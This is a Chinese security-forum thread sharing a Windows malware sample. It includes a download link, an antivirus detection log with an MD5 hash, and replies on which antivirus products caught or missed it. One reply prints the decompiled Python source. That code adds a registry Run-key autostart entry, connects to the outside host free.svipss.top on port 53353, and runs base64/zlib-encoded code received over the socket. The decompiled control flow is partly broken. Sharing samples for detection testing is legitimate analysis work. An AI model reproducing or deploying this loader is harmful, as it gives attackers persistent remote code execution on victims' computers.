[病毒样本] 1X

显示全部楼层 · 发表于 2023-2-5 17:28:46

https://cowtransfer.com/s/19a5515b044447

显示全部楼层 · 发表于 2023-2-5 17:41:08

事件: 检测到恶意对象
应用程序: main_code.exe
用户: DESKTOP-MQPTK29\lybing
用户类型: 发起者
组件: 系统监控
结果说明: 检测到
类型: 木马
名称: PDM:Trojan.Win32.Generic
威胁级别: 高
对象类型: 进程
对象路径: C:\Users\lybing\Desktop\main_code
对象名称: main_code.exe
原因: 行为分析
数据库发布日期: 今天，2023/2/5 9:27:00
MD5: E959D4EAB2BC3A03E16A2679AFBB6FD1

显示全部楼层 · 发表于 2023-2-5 17:45:48

就拦截了个开机启动项......

显示全部楼层 · 发表于 2023-2-5 17:54:34

金山毒霸miss

显示全部楼层 · 发表于 2023-2-5 19:15:26

McAfee双击miss

显示全部楼层 · 发表于 2023-2-5 19:50:36

BEST ATC

显示全部楼层 · 发表于 2023-2-5 21:00:19

腾管 kill

显示全部楼层 · 发表于 2023-2-5 23:24:20

Avast：0

过CC（

被添加了自启动项（悲）

运行一段时间后自退。

显示全部楼层 · 发表于 2023-2-6 09:07:56

# Source Generated with Decompyle++
# File: main_code.pyc (Python 3.7)
'''
\xe4\xbd\x9c\xe8\x80\x85\xef\xbc\x9aVMWARE\xe5\x87\xba\xe7\x94\x9f\xe6\x9c\xba\tQ:SU-BM
\xe6\x97\xb6\xe9\x97\xb4\xef\xbc\x9a\xe5\x88\x9d\xe9\x9f\xb3\xe7\xba\xaa\xe5\x85\x8311\xe5\xb9\xb44\xe6\x9c\x885\xe6\x97\xa514\xe6\x97\xb6
'''
import struct
import time
import socket
import zlib
import base64
import win32api
import win32con
import winreg
import os
def Judge_Key(key_name, reg_root, reg_path = (win32con.HKEY_CURRENT_USER, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run')):
'''
:param key_name: # \xe8\xa6\x81\xe6\x9f\xa5\xe8\xaf\xa2\xe7\x9a\x84\xe9\x94\xae\xe5\x90\x8d
:param reg_root: # \xe6\xa0\xb9\xe8\x8a\x82\xe7\x82\xb9
#win32con.HKEY_CURRENT_USER
#win32con.HKEY_CLASSES_ROOT
#win32con.HKEY_CURRENT_USER
#win32con.HKEY_LOCAL_MACHINE
#win32con.HKEY_USERS
#win32con.HKEY_CURRENT_CONFIG
:param reg_path: # \xe9\x94\xae\xe7\x9a\x84\xe8\xb7\xaf\xe5\xbe\x84
:return:feedback\xe6\x98\xaf\xef\xbc\x880/1/2/3\xef\xbc\x9a\xe5\xad\x98\xe5\x9c\xa8/\xe4\xb8\x8d\xe5\xad\x98\xe5\x9c\xa8/\xe6\x9d\x83\xe9\x99\x90\xe4\xb8\x8d\xe8\xb6\xb3/\xe6\x8a\xa5\xe9\x94\x99\xef\xbc\x89
'''
reg_flags = win32con.WRITE_OWNER | win32con.KEY_WOW64_64KEY | win32con.KEY_ALL_ACCESS
try:
key = winreg.OpenKey(reg_root, reg_path, 0, reg_flags)
(location, type) = winreg.QueryValueEx(key, key_name)
feedback = 0
except FileNotFoundError:
e = None
try:
feedback = 1
finally:
e = None
del e
except PermissionError:
e = None
try:
feedback = 2
finally:
e = None
del e
except:
feedback = 3
return feedback
def AutoRun(switch, zdynames, current_file, abspath = ('open', None, None, os.path.abspath(os.path.dirname(__file__)))):
path = abspath + '\\' + zdynames
judge_key = Judge_Key(win32con.HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', current_file, **('reg_root', 'reg_path', 'key_name'))
KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, KeyName, 0, win32con.KEY_ALL_ACCESS)
if switch == 'open':
try:
if judge_key == 0:
pass
elif judge_key == 1:
win32api.RegSetValueEx(key, current_file, 0, win32con.REG_SZ, path)
win32api.RegCloseKey(key)
elif switch == 'close':
try:
if judge_key == 0:
win32api.RegDeleteValue(key, current_file)
win32api.RegCloseKey(key)
elif judge_key == 1:
pass
elif judge_key == 2:
pass
except:
pass
AutoRun('open', 'main_code.exe', 'main_code', os.path.abspath(os.path.dirname(__file__)), **('switch', 'zdynames', 'current_file', 'abspath'))
for x in range(10):
try:
s = socket.socket(2, socket.SOCK_STREAM)
s.connect(('free.svipss.top', 53353))
continue
time.sleep(5)
continue
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(l)
while len(d) < l:
d += s.recv(l - len(d))
exec(zlib.decompress(base64.b64decode(d)), {
's': s })

复制代码

显示全部楼层 · 发表于 2023-2-6 09:59:56

火绒miss

[病毒样本] 1X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源